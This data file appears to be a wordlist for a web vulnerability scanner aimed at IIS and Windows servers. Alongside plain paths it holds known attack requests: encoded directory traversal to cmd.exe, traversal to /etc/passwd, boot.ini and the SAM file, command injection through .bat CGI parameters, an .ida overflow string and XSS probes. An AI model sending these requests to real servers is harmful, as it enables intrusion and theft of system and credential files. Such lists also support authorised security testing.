/Account/Register.aspx
/Account/Login.aspx
/Account/ChangePassword.aspx
/Account/ChangePasswordSuccess.aspx
/Register.aspx
/Login.aspx
/ChangePassword.aspx
/ChangePasswordSuccess.aspx
/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/a%5c.aspx
/AccessPlatform/
/AccessPlatform/auth/
/AccessPlatform/auth/clientscripts/
/AccessPlatform/auth/clientscripts/cookies.js 
/AccessPlatform/auth/clientscripts/login.js 
/admin/
/administration/
/administrator/
/Admin/knowledge/dsmgr/users/GroupManager.asp
/Admin/knowledge/dsmgr/users/UserManager.asp
/adovbs.inc
/adsamples/
/AdvWorks/equipment/catalog_type.asp
/ajfhasdfgsagfakjhgd
/archi~1/
/Archi~1/
/aspnet_files/
/asp/
/asps/
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/_AuthChangeUrl?
/bin/
/bins/
/certcontrol/
/certenroll/
/certsrv/
/cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/CFIDE/Administrator/startstop.html
/cgi
/cgi-bin/a1stats/a1disp.cgi
/cgi-bin/htimage.exe?2,2
/cgi-bin/htmlscript
/cgi-bin/imagemap.exe?2,2
/checkapache.html
/citrix/
/citrix/AccessPlatform/auth/
/citrix/AccessPlatform/auth/clientscripts/
/Citrix//AccessPlatform/auth/clientscripts/cookies.js 
/Citrix/AccessPlatform/auth/clientscripts/login.js 
/Citrix/PNAgent/config.xml
/clocktower
/cmsample/
/db/
/domcfg.nsf/?open
/Exadmin/
/Exchange/
/exchange/root.asp
/ExchWeb/
/forum_arc.asp
/forum.asp
/forum_professionnel.asp
/help/
/iiasdmpwd/
/iisadmin/
/iisadmpwd/achg.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp.htr
/iisadmpwd/anot3.htr
/iisadmpwd/anot.htr
/iishelp/
/iishelp/iis/misc/default.asp
/iissamples/
/iissamples/exair/howitworks/Code.asp
/iissamples/exair/howitworks/Codebrw1.asp
/iissamples/exair/howitworks/Codebrws.asp
/iissamples/sdk/asp/docs/codebrw2.asp
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/sdk/asp/docs/CodeBrws.asp
/imprimer.asp
/includes/adovbs.inc
/index.php
/index.shtml
/isapi/
/_layouts/alllibs.htm
/_layouts/settings.htm
/_layouts/userinfo.htm
/Mail/smtp/Admin/smadv.asp
/market
/_mem_bin/
/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_mem_bin/autoconfig.asp
/_mem_bin/formslogin.asp
/Micros~1/
/Microsoft-Server-ActiveSync/
/msadc/
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/msadc/Samples/selector/showcode.asp
/msdac/root.exe?/c+dir
/mspress30
/%NETHOOD%/
/null.htw
/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite
/OMA/
/OWA/
/pbserver/pbserver.dll
/postinfo.html
/.printer
/_private
/progra~1
/Progra~1
/Public/
/publisher
/qwertypoiu.htw
/qwertypoiu.printer
/rubrique.asp
/samples/
/~/<script>alert('XSS')</script>.asp
/~/<script>alert('XSS')</script>.aspx
/<script>alert('XSS')</script>.aspx
/scripts/
/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
/scripts/cgimail.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/fpcount.exe
/scripts/iisadmin/ism.dll?http/dir
/scripts/no-such-file.pl
/scripts/root.exe?/c+dir
/scripts/samples/search/webhits.exe
/scripts/tools/getdrvs.exe
/scripts/tools/newdsn.exe
/search?NS-query-pat=..\..\..\..\..\boot.ini
/share/
/SiteServer/Admin
/SiteServer/Admin/commerce/foundation/driver.asp
/SiteServer/Admin/commerce/foundation/DSN.asp
/SiteServer/admin/findvserver.asp
/SiteServer/Admin/knowledge/dsmgr/default.asp
/siteserver/publishing/viewcode.asp
/SiteServer/Publishing/viewcode.asp
/Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
/Sites/Knowledge/Membership/Inspired/ViewCode.asp
/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
/Sites/Samples/Knowledge/Push/ViewCode.asp
/Sites/Samples/Knowledge/Search/ViewCode.asp
/test/
/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA
/tsweb/
/vc30
/_fpclass/
/_vti_adm/
/_vti_aut/
/_vti_bin/
/_vti_bin/
/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/fpcount.exe?Page=default.asp|Image=3
/_vti_bin/shtml.dll
/_vti_bin/shtml.dll/asdfghjkl
/_vti_bin/shtml.exe/qwertyuiop
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/fp30reg.dll
/_vti_bin/_vti_aut/fp30reg.dll?1234=X
/_vti_cnf/
/_vti_log/
/_vti_pvt/
/_vti_pvt/
/_vti_pvt/administrator.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/_vti_script
/_vti_txt
/_WEB_INF/
/WEB-INF/web.xml
/WebSer~1
/x.cfm
/x.htw
/x.htx
/x.ida
/x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
/x.idc
/x.idq
/x.pl
/x.shtml
/cart32.exe
/get32.exe
/visadmin.exe
/foxweb.exe
/webplus.exe?about
/fpsrvadm.exe
/MsmMask.exe
/cmd.exe?/c+dir
/cmd1.exe?/c+dir
/post32.exe|dir%20c:\\
/cgitest.exe
/hpnst.exe?c=p+i=
/Pbcgi.exe
/testcgi.exe
/webfind.exe?keywords=01234567890123456789
/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
/test-cgi.exe?<script>alert(document.cookie)</script>
/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
/mkilog.exe
/mkplog.exe
/MsmMask.exe?mask=/junk334
/MsmMask.exe?mask=/junk334
/MsmMask.exe?mask=/junk334
/MsmMask.exe?mask=/junk334
/MsmMask.exe?mask=/junk334
/perl.exe?-v
/perl.exe
/ppdscgi.exe
/c32web.exe/ChangeAdminPassword
/windmail.exe
/dbmlparser.exe
/cgimail.exe
/minimal.exe
/rguest.exe
/visitor.exe
/webbbs.exe
/wguest.exe
//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
/cfgwiz.exe
/Cgitest.exe
/mailform.exe
/post16.exe
/imagemap.exe
/htimage.exe/path/filename?2,2
/htimage.exe
/Webnews.exe
/texis.exe/junk
/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
/sensepost.exe?/c+dir
/testcgi.exe
/testcgi.exe?<script>alert(document.cookie)</script>
/ion-p.exe?page=c:\winnt\repair\sam
/../../../../../../../../../../WINNT/system32/ipconfig.exe
/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
/foxweb.dll
/wconsole.dll
/shtml.dll
/scripts/slxweb.dll/getfile?type=Library&file=[invalid
/filename]
/rightfax/fuwww.dll/?
/WINDMAIL.EXE?%20-n%20c:\boot.ini%
/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
/GW5/GWWEB.EXE
/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
/GW5/GWWEB.EXE?HELP=bad-request
/GWWEB.EXE?HELP=bad-request
/echo.bat
/echo.bat?&dir+c:\\
/hello.bat?&dir+c:\\
/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/input2.bat?|dir
/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/test-cgi.bat
/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X
/msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName
/admin.dll
/admin.exe
/administrators.pwd
/author.dll
/author.exe
/author.log
/authors.pwd
/cgi-bin
/default.htm
/_fpclass
/frontpg.ini
/.htaccess
/iisadmin
/isadmin
/logo.gif
/_private
/queryhit.htm
/QUERYHIT.HTM
/samples
/search
/Search
/service.grp
/service.pwd
/shtml.exe
/srchadm
/users.pwd
/_vti_adm
/_vti_aut
/_vti_bin
/_vti_cnf
/_vti_inf.html
/vti_inf.html
/_vti_log
/_vti_pvt
/_vti_txt
iistart.htm
index.htm
default.htm
default.asp
default.aspx
Default.aspx
index.asp
index.aspx
/rpc